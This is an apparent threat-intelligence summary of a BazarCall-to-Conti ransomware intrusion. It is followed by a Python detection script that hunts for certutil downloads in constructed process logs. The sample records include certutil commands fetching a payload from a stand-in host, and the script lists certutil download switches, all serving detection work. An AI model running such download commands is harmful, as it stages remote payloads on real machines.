BazarCall to Conti Ransomware via Trickbot and Cobalt Strike
released on 2021-08-02 @ 09:05:30 AM
Threat actors used BazarCall to install Trickbot in the environment, which then downloaded and executed a Cobalt Strike Beacon. The Trickbot payload came from a phishing campaign associated with BazarCall, delivering weaponized XLSB files. Certutil was used to download the Trickbot DLL, which was then loaded into memory. A couple of days later, the threat actors came back and executed Conti ransomware across the domain.
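The certutil step in the chain above is the one a defender can most readily hunt for in process-creation telemetry. The following is an added example, not code from the original report or from any of the tooling it describes: it parses a handful of constructed log records (made up here to resemble Sysmon Event ID 1 data flattened to key=value pairs, not taken from the incident) and flags certutil invocations whose command line combines a download-capable switch with a URL, while leaving ordinary uses such as hash computation alone. The record format, the field names and the sample values are assumptions of this example; the `-urlcache` and `-verifyctl` switches are real certutil options.

```python
"""Hunt for certutil-based downloads in process-creation logs (added example).

The records below are constructed for this example and resemble Sysmon
Event ID 1 entries flattened to key=value pairs; they are not real telemetry.
"""
import re
from typing import Dict, List

# Constructed sample records (not real data). Line 1 models the chain in the
# report: an Office process launching certutil to fetch a DLL. Lines 2, 3 and
# 5 are benign; line 4 uses the alternative -verifyctl download switch.
SAMPLE_LOGS = [
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe '
    'ParentImage="C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE" '
    'CommandLine="certutil -urlcache -split -f http://example.invalid/payload.dll C:\\Users\\Public\\p.dll"',
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe '
    'ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="certutil -hashfile C:\\Users\\alice\\setup.exe SHA256"',
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe '
    'ParentImage=C:\\Windows\\explorer.exe CommandLine="cmd /c dir"',
    'EventID=1 Image=C:\\Windows\\SysWOW64\\certutil.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="CertUtil.exe -VerifyCtl -f -split https://example.invalid/x.bin"',
    'EventID=1 Image=C:\\Windows\\System32\\certutil.exe '
    'ParentImage=C:\\Windows\\System32\\cmd.exe CommandLine="certutil -urlcache"',
]

# key=value pairs; values may be double-quoted when they contain spaces.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# certutil switches that can fetch a remote resource (documented options).
DOWNLOAD_SWITCHES = {"-urlcache", "-verifyctl", "/urlcache", "/verifyctl"}
# Parent processes that indicate a document-borne launch (assumed list).
OFFICE_PARENTS = ("excel.exe", "winword.exe", "powerpnt.exe")


def parse_record(line: str) -> Dict[str, str]:
    """Turn one flattened key=value record into a dict."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in KV_RE.finditer(line)
    }


def is_certutil_download(record: Dict[str, str]) -> bool:
    """True when certutil is run with a download switch and a URL argument."""
    image = record.get("Image", "").lower()
    if not (image.endswith("\\certutil.exe") or image == "certutil.exe"):
        return False
    # Windows paths contain backslashes, so split on whitespace rather than
    # using shlex, which would eat them.
    tokens = record.get("CommandLine", "").split()
    switches = {t.lower() for t in tokens if t.startswith(("-", "/"))}
    has_url = any(URL_RE.match(t) for t in tokens)
    # "certutil -urlcache" alone only lists the cache; require a URL too.
    return bool(switches & DOWNLOAD_SWITCHES) and has_url


def find_certutil_downloads(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per record that looks like a certutil download."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if not is_certutil_download(rec):
            continue
        parent = rec.get("ParentImage", "")
        hits.append({
            "parent": parent,
            "command": rec.get("CommandLine", ""),
            # An Office parent matches the XLSB delivery described above.
            "office_parent": parent.lower().endswith(OFFICE_PARENTS),
        })
    return hits


if __name__ == "__main__":
    for hit in find_certutil_downloads(SAMPLE_LOGS):
        tag = "OFFICE-SPAWNED " if hit["office_parent"] else ""
        print(f"{tag}{hit['parent']} -> {hit['command']}")
```

The `office_parent` field is what turns a noisy LOLBin match into a higher-confidence alert: certutil fetching a remote file is unusual on its own, and certutil spawned by Excel or Word is the specific shape of the maldoc-to-loader step in this intrusion.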